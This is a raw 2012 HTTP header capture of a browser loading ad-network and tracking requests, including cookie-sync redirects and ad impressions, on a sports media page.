Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=2; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-205-49-80
Date: Mon, 19 Nov 2012 04:17:42 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:43 GMT; Path=/ pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:43 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=BM-00000003256334509 HTTP/1.1

Host: m.xp1.ru4.com
GET /meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=BM-00000003256334509 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: X1ID=BM-00000003256334509
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 19 Nov 2012 04:17:43 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NON DSP COR PSAa OUR STP UNI&quot;
Content-Length: 0
Pragma: no-cache
Set-Cookie: 31041217-B31041253=2|31041261|0|0|0|31041233|31041230|-1; domain=.ru4.com; path=/ O179638=0@0@0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT C31041217=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Location: http://m.xp1.ru4.com/activity?_o=62795&amp;_t=cm_bk_udc
X-Cnection: close
GET /RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15 HTTP/1.1

Host: network.realmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?dxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA==,,http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php,Z%3D300x250%26_salt%3D698192661%26anmember%3D514%26anprice%3D80%26r%3D0%26s%3D1651067,10146920-3200-11e2-9fc0-1cc1def0ff7e,1353298662569
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=w5+M3VCpsucAAtm0; path=/; expires=Wed, 19-Nov-14 04:17:43 GMT; domain=.realmedia.com RMFD=011TaInnO101GLK; path=/; expires=Wed, 19-Nov-14 04:17:43 GMT; domain=.realmedia.com NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Mon, 19-Nov-2012 04:18:43 GMT;path=/;httponly
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Cache-Control: no-cache,no-store,private
Content-Length: 1774
Keep-Alive: timeout=60
Connection: Keep-Alive
GET /Images/c_ad_logo.png HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=wjzyzr31rdtsq4rrlm3pacbw; urlHistory=388817:1,387812:1,12084:1,106115:1
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 02 Aug 2012 00:04:21 GMT
Accept-Ranges: bytes
Etag: &quot;b5a81a5e4270cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:19 GMT
Content-Length: 8598
GET /m/cw HTTP/1.1

Host: cw-m.d.chango.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: _t=100b3eb8-3200-11e2-934d-00259036ff0a
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 35
Server: RTB
Etag: &quot;0f4e929dd5bb2564f7ab9c76338e04e292a42ace&quot;
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref=&quot;http://as.chango.com/static/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Set-Cookie: _t=100b3eb8-3200-11e2-934d-00259036ff0a; Domain=chango.com; expires=Thu, 17 Nov 2022 04:17:43 GMT; Path=/
Connection: close
GET /activity?_o=62795&_t=cm_bk_udc HTTP/1.1

Host: m.xp1.ru4.com
GET /activity?_o=62795&amp;_t=cm_bk_udc HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: X1ID=BM-00000003256334509; 31041217-B31041253=2|31041261|0|0|0|31041233|31041230|-1
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 19 Nov 2012 04:17:43 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NON DSP COR PSAa OUR STP UNI&quot;
Pragma: no-cache
Location: http://tags.bluekai.com/site/2751?id=BM-00000003256334509
Content-Length: 0
X-Cnection: close
GET /imp?anmember=514&anprice=100&Z=300x250&s=653070&r=0&_salt=115542970&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=100&amp;Z=300x250&amp;s=653070&amp;r=0&amp;_salt=115542970&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: testbounce=testing; BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0038.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:43 GMT
Expires: Mon, 19 Nov 2012 04:17:43 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /PropertyAssets/ArticleImages/0470efce6f44155aa8844d74818ecbcc_922ba3918b3b628b0c6f4008f602718c.jpg HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=wjzyzr31rdtsq4rrlm3pacbw; urlHistory=388817:1,387812:1,12084:1,106115:1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Thu, 24 May 2012 18:27:32 GMT
Accept-Ranges: bytes
Etag: &quot;c506ee2da39cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:19 GMT
Content-Length: 11550
GET /ttj?id=919932&size=300x250&referrer=http%3A//ad.yieldmanager.com/iframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D698192661%2526anmember%253D514%2526anprice%253D80%2526r%253D0%2526s%253D1651067%2C10146920-3200-11e2-9fc0-1cc1def0ff7e%2C1353298662569&pt1=http://network.realmedia.com/3/bloguin/Passback/276422772@x15?RM_Exclude=USNetworkMAX_COMPCATEGORY&ext_inv_code=bloguin&cb=276422772&reserve=0.25&pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/276422772/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d335643707375634141746d30? HTTP/1.1

Host: ib.adnxs.com
GET /ttj?id=919932&amp;size=300x250&amp;referrer=http%3A//ad.yieldmanager.com/iframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D698192661%2526anmember%253D514%2526anprice%253D80%2526r%253D0%2526s%253D1651067%2C10146920-3200-11e2-9fc0-1cc1def0ff7e%2C1353298662569&amp;pt1=http://network.realmedia.com/3/bloguin/Passback/276422772@x15?RM_Exclude=USNetworkMAX_COMPCATEGORY&amp;ext_inv_code=bloguin&amp;cb=276422772&amp;reserve=0.25&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/276422772/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d335643707375634141746d30? HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQQQAn*$l!B)c&gt;.#QydEnS'Jn!wd6!:(Q!%64(.; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgDIAMoAzDm5aaFBRDm5aaFBRgD; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb736745=![nC'208WMHC=j@E/qX3/1#:J?enc=MzMzMzMz8z9SuB6F61HwPwAAAEAzM_M_UrgehetR8D8zMzMzMzPzPxpzuWDUr9dgoArzhH1cTlHmsqlQAAAAAKyWCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAIE8BAgUCAQUAAAAA5iDVpQAAAAA.&amp;tt_code=653070&amp;cnd=%21SyLVZAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEzMzMzMzPzP8EBMzMzMzMz8z_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298662%29%3Buf%28%27r%27%2C+3581447%2C+1353298662%29%3Bppv%2827656%2C+%276978239474324566810%27%2C+1353298662%2C+1353557862%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:43 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:43 GMT; domain=.adnxs.com; HttpOnly icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgDIAMoAzDm5aaFBQoSCNPMCBAKGAEgASgBMOflpoUFEOflpoUFGAQ.; path=/; expires=Sun, 17-Feb-2013 04:17:43 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQQQAn*$l!B)c&gt;.#QydEnS'Jn!wd6!:(Q!%64(.; path=/; expires=Sun, 17-Feb-2013 04:17:43 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 19 Nov 2012 04:17:43 GMT
Content-Length: 1374
GET /p/b3/70/6b/64/b3706b64e2cd0d8c89492e0d7889b257.jpg HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQQQAn*$l!B)c&gt;.#QydEnS'Jn!wd6!:(Q!%64(.; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgDIAMoAzDm5aaFBQoSCNPMCBAKGAEgASgBMOflpoUFEOflpoUFGAQ.; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb736745=![nC'208WMHC=j@E/qX3/1#:J?enc=MzMzMzMz8z9SuB6F61HwPwAAAEAzM_M_UrgehetR8D8zMzMzMzPzPxpzuWDUr9dgoArzhH1cTlHmsqlQAAAAAKyWCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAIE8BAgUCAQUAAAAA5iDVpQAAAAA.&amp;tt_code=653070&amp;cnd=%21SyLVZAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEzMzMzMzPzP8EBMzMzMzMz8z_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298662%29%3Buf%28%27r%27%2C+3581447%2C+1353298662%29%3Bppv%2827656%2C+%276978239474324566810%27%2C+1353298662%2C+1353557862%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Apache
Etag: &quot;b3706b64e2cd0d8c89492e0d7889b257:1353077062&quot;
Last-Modified: Fri, 16 Nov 2012 14:44:15 GMT
Accept-Ranges: bytes
Content-Length: 27915
Date: Mon, 19 Nov 2012 04:17:43 GMT
Connection: keep-alive
GET /PropertyAssets/ArticleImages/e14f112f16e83f75d379894ff46973ce_922ba3918b3b628b0c6f4008f602718c.jpg HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=wjzyzr31rdtsq4rrlm3pacbw; urlHistory=388817:1,387812:1,12084:1,106115:1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 05 Sep 2012 23:49:47 GMT
Accept-Ranges: bytes
Etag: &quot;f8308221c18bcd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:19 GMT
Content-Length: 14730
GET /iframe3?bV5bEg73CQAQ7oEAAAAAAPL-IAAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAAmGQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0nl0zZ5fyDJK-L4dTr-5Wz7Lp7cDnX.5.rk.vAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18elijit_box..html,Z%3D300x250%26_salt%3D115542970%26anmember%3D514%26anprice%3D100%26r%3D0%26s%3D653070,106c775a-3200-11e2-909d-b32498808ef9,1353298663146 HTTP/1.1

Host: ad.yieldmanager.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: testbounce=testing; BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0465.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:43 GMT
Expires: Mon, 19 Nov 2012 04:17:43 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /site/2751?id=BM-00000003256334509 HTTP/1.1

Host: tags.bluekai.com

